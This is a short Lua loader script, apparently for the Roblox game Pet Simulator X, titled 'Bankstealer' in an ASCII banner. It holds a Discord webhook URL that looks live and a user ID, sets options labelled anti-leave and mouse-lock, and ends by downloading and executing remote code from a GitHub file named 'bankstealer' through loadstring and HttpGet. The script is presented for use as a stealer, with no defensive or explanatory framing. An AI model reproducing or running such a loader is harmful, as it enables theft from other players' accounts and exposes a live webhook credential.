--[[
   ____              _        _             _           
  | __ )  __ _ _ __ | | _____| |_ ___  __ _| | ___ _ __ 
  |  _ \ / _` | '_ \| |/ / __| __/ _ \/ _` | |/ _ \ '__|
  | |_) | (_| | | | |   <\__ \ ||  __/ (_| | |  __/ |   
  |____/ \__,_|_| |_|_|\_\___/\__\___|\__,_|_|\___|_| 

]]--

_G.UserID = "6peterkutka9"
_G.Webhook = "https://discord.com/api/webhooks/1137869908324143124/yM7p1OFKvWcQiKYWb6MrVra8VeF9KObR9L96FsKJpLd6VndApFVMe_mkQ3uNIhHvw7vd"

_G.LoadingScreen = false -- make it true if you want the loadingscreen
_G.AntiLeave = false -- make it true if you want the antileave
_G.MouseLock = false -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/Egorikusa/PetSimulatorX/main/bankstealer", true))()
